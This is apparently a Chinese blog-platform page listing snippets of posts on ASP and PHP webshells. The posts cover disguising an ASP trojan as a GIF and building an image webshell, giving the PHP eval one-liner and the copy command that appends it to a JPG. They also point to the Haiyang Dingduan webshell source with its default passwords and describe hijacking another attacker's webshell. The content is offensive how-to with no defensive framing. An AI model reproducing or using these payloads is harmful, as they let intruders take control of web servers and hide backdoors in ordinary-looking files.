一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人",但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。 asp木马已经出现很长时间了,种类也越来越多,隐蔽性也非常强,现在我们就找一个asp木马把它作成图片asp木马。 首先我们把asp木马服务端直接该后缀名为gif,记得用容错格式: 一、include给我们指路 接下来要使用include...
图片一句话木马的简单制作
sweetie 的博客
11-11 1254
新建一个文件夹 其中放入一张图片,shell.php一句话木马,写入cmd的bat文件 shell.php中的一句话木马内容为 <?php @eval($_POST[sweetie]);?> 点击bat文件进入DOS命令,写入"copy 1.jpg/b+shell.php shell.jpg" 回车 ...
海阳顶端网asp木马2005α版
陈巍@人生态度
08-08 3866
http://www.xfocus.net/tools/200407/2005.rar
[转载]海阳顶端网ASP木马@2005α版全部源代码
Nest of Nonsenser
01-07 2410
信息来源:黑客手册"密码第一个是makelove,第二个是haiyangtop.126.com,查找替换这两个单词就可以改成别的密码了%> end if %>BODY {SCROLLBAR-FACE-COLOR: #ffe1e8; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffe1e8; SCROLLBAR-SHADOW-COLOR: #ff9dbb
海阳顶端网php,海阳顶端网的ASP木马的一个漏洞和利用
weixin_33272141的博客
03-12 413
希望LCX别看到这篇文章,呵呵最近海洋不知道怎么回事,不能上了,我就发在这里了。我粗粗的看了一下代码,发现了一个问题,可以得到木马的密码,变成自己的木马。思路是通过提交的COOKIE来查看木马的原代码,找出密码看下面的代码iftrim(request.form("password"))="haiyangtop.126.com"thenresponse.cookies("password")="...
海阳顶端网php,海阳顶端网2006正式版试用小记
weixin_34476045的博客
03-12 185
作者:许子先@[T.I.T]相信大家对海阳顶端网ASP木马都不陌生吧,尤其是在现在注入漏洞盛行时期,海阳顶端网ASP木马成了不少网络高手必备工具。由于它简单易行的操作,也逐渐成为广大菜鸟的宠儿。在大家开学之季,海阳顶端网ASP木马也推出了新版本2006版。这个版本在功能上有了明显的改进。增加了好多贴切用户的新功能。如:更详细的服务器信息、修改文件属性功能、文件打包功能(不用RAR)、注册表读取功能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值